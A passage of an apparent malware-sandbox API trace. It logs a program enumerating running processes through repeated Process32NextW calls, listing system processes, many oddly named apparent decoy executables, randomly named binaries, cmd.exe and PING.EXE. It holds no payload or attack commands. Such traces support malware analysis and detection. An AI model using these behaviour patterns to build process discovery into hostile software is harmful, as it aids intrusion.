lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.559] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.560] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.561] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.621] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.622] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.623] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.624] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.625] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.627] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.628] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.629] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.631] CloseHandle (hObject=0xc4) returned 1 [0101.631] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0101.636] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.639] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.644] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.646] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.647] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.693] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.699] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.710] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0101.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 